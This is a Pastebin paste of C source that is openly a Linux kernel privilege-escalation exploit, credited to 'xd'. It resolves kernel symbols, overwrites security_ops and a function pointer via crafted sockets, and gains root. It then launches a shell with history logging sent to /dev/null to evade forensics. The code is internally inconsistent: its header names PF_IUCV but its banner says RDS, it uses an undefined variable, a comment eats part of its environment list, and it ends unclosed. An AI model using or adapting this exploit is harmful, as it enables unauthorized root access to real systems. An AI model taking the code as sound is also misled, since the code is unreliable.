API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jun 21st, 2017
66
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Clone C++ 5.42 KB | None | 0 0
raw download clone embed print report
  1. /*
  2.  * Linux Kernel <= 2.6.36 PF_IUCV privilege escalation exploit
  3. * thanks to BCM/ROSe and other bs socket exploits :) -xd
  4. * Greetz: #Haqnet @ efnet , paralox.org and many other frinds who help make my world fun!
  5. */
  6. #include <stdio.h>
  7. #include <unistd.h>
  8. #include <stdlib.h>
  9. #include <fcntl.h>
  10. #include <sys/types.h>
  11. #include <sys/socket.h>
  12. #include <netinet/in.h>
  13. #include <errno.h>
  14. #include <string.h>
  15. #include <sys/ptrace.h>
  16. #include <sys/utsname.h>
  17.  
  18. #define RECVPORT 12000
  19. #define SENDPORT 12001
  20.  
  21. /* define sycalls for the lame boxes */
  22. #define PF_IUCV AF_IUCV
  23. #define AF_IUCV 32
  24.  
  25. int prep_sock(int port) {
  26. int s, ret;
  27. struct sockaddr_in addr;
  28. s = socket(PF_IUCV, SOCK_SEQPACKET, 0);
  29. if(s < 0) {
  30. printf("[*] Could not open socket.\n");
  31. exit(-1);
  32. }
  33. memset(&addr, 0, sizeof(addr));
  34. addr.sin_addr.s_addr = inet_addr("127.0.0.1");
  35. addr.sin_family = PF_IUCV;  //AF_INET;
  36. addr.sin_port = htons(port);
  37. ret = bind(s, (struct sockaddr *)&addr, sizeof(addr));
  38. if(ret < 0) {
  39. printf("[*] Could not bind socket.\n");
  40. exit(-1);
  41. }
  42. return s;
  43. }
  44.  
  45. void get_message(unsigned long address, int sock) {
  46. recvfrom(sock, (void *)address, sizeof(void *), 0,NULL, NULL);
  47. }
  48.  
  49. void send_message(unsigned long value, int sock) {
  50. int size, ret;
  51. struct sockaddr_in recvaddr;
  52. struct msghdr msg;
  53. struct iovec iov;
  54. unsigned long buf;
  55. memset(&recvaddr, 0, sizeof(recvaddr));
  56. size = sizeof(recvaddr);
  57. recvaddr.sin_port = htons(RECVPORT);
  58. recvaddr.sin_family = AF_IUCV; // AF_INET; could maybe be used but lets be safe and send over a PROPEr crafted packet eh?
  59. recvaddr.sin_addr.s_addr = inet_addr("127.0.0.1");
  60. memset(&msg, 0, sizeof(msg));
  61. msg.msg_name = &recvaddr;
  62. msg.msg_namelen = sizeof(recvaddr);
  63. msg.msg_iovlen = 1;
  64. buf = value;
  65. iov.iov_len = sizeof(buf);
  66. iov.iov_base = &buf;
  67. msg.msg_iov = &iov;
  68. ret = sendmsg(sock, &msg, 0);
  69. if(ret < 0) {
  70. printf("[*] Something went wrong sending.\n");
  71. exit(-1);
  72. }
  73. }
  74.  
  75. void write_to_mem(unsigned long addr, unsigned long value, int sendsock, int recvsock) {
  76. if(!fork()) {
  77. sleep(1);
  78. send_message(value, sendsock);
  79. exit(1);
  80. } else {
  81. get_message(addr, recvsock);
  82. wait(NULL);
  83. }
  84. }
  85.  
  86. typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
  87. typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
  88. _commit_creds commit_creds;
  89. _prepare_kernel_cred prepare_kernel_cred;
  90.  
  91. int __attribute__((regparm(3)))
  92. getroot(void * file, void * vma) {
  93. commit_creds(prepare_kernel_cred(0));
  94. return -1;
  95. }
  96.  
  97. unsigned long get_kernel_sym(char *name) {
  98. FILE *f;
  99. unsigned long addr;
  100. char dummy;
  101. char sname[512];
  102. struct utsname ver;
  103. int ret;
  104. int rep = 0;
  105. int oldstyle = 0;
  106. f = fopen("/proc/kallsyms", "r");
  107. if (f == NULL) {
  108. f = fopen("/proc/ksyms", "r");
  109. if (f == NULL)
  110. goto fallback;
  111. oldstyle = 1;
  112. }
  113. repeat:
  114. ret = 0;
  115. while(ret != EOF) {
  116. if (!oldstyle)
  117. ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
  118. else {
  119. ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
  120. if (ret == 2) {
  121. char *p;
  122. if (strstr(sname, "_O/") || strstr(sname, "_S."))
  123. continue;
  124. p = strrchr(sname, '_');
  125. if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
  126. p = p - 4;
  127. while (p > (char *)sname && *(p - 1) == '_')
  128. p--;
  129. *p = '\0';
  130. }
  131. }
  132. }
  133. if (ret == 0) {
  134. fscanf(f, "%s\n", sname);
  135. continue;
  136. }
  137. if (!strcmp(name, sname)) {
  138. fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
  139. fclose(f);
  140. return addr;
  141. }
  142. }
  143. fclose(f);
  144. if (rep)
  145. return 0;
  146. fallback:
  147. uname(&ver);
  148. if (strncmp(ver.release, "2.6", 3))
  149. oldstyle = 1;
  150. sprintf(sname, "/boot/System.map-%s", ver.release);
  151. f = fopen(sname, "r");
  152. if (f == NULL)
  153. return 0;
  154. rep = 1;
  155. goto repeat;
  156. }
  157.  
  158. int main(int argc, char * argv[]) {
  159. unsigned long sec_ops, def_ops, cap_ptrace, target;
  160. int sendsock, recvsock;
  161. struct utsname ver;
  162. printf("[*] Linux kernel >= 2.6.30 RDS socket exploit\n");
  163. uname(&ver);
  164. if(strncmp(ver.release, "2.6.3", 5)) {
  165. printf("[*] Your kernel is not vulnerable.\n");
  166. return -1;
  167. }
  168. printf("[*] Resolving kernel addresses..\n");
  169. sec_ops = get_kernel_sym("security_ops");
  170. def_ops = get_kernel_sym("default_security_ops");
  171. cap_ptrace = get_kernel_sym("cap_ptrace_traceme");
  172. commit_creds = (_commit_creds) get_kernel_sym("commit_creds");
  173. prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");
  174. if(!sec_ops || !def_ops || !cap_ptrace || !commit_creds || !prepare_kernel_cred) {
  175. printf("[*] Failed to resolve kernel symbols.\n");
  176. return -1;
  177. }
  178. target = def_ops + sizeof(void *) + ((11 + sizeof(void *)) & ~(sizeof(void *) - 1));
  179. sendsock = prep_sock(SENDPORT);
  180. recvsock = prep_sock(RECVPORT);
  181. printf("[*] Overwriting security ops...\n");
  182. write_to_mem(sec_ops, def_ops, sendsock, recvsock);
  183. printf("[*] Overwriting function pointer...\n");
  184. write_to_mem(target, (unsigned long)&getroot, sendsock, recvsock);
  185. printf("[*] Triggering payload...\n");
  186. ptrace(PTRACE_TRACEME, 1, NULL, NULL);
  187. printf("[*] Restoring function pointer...\n");
  188. write_to_mem(target, cap_ptrace, sendsock, recvsock);
  189. if(getuid()) {
  190. printf("[*] Exploit failed to get root.\n");
  191. return -1;
  192. }                                               // ok here you can do wtf ya want...change it how ya like..enjoy! -xd
  193. else {
  194. printf("[+] Launching rocket!\n");
  195. setresuid(0, 0, 0);
  196. setresgid(0, 0, 0);
  197. if(getuid() == 0) {
  198. pid_t pid;
  199. pid = fork();
  200. if(pid == 0) {
  201. char *envp[] = {"TERM=linux", "BASH_HISTORY=/dev/null", "HISTORY=/dev/null", "history=/dev/null", "HISTFILE=/dev/null", "HISTSIZE=0",   // thx tropic"PATH=/bin:/sbin:/usr/sbin:/usr/bin:/usr/local/bin:/usr/local/sbin", NULL };
  202. execve("/bin/sh","/bin/sh", args, envp);
  203. printf("[*] Got root!\n");
  204. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!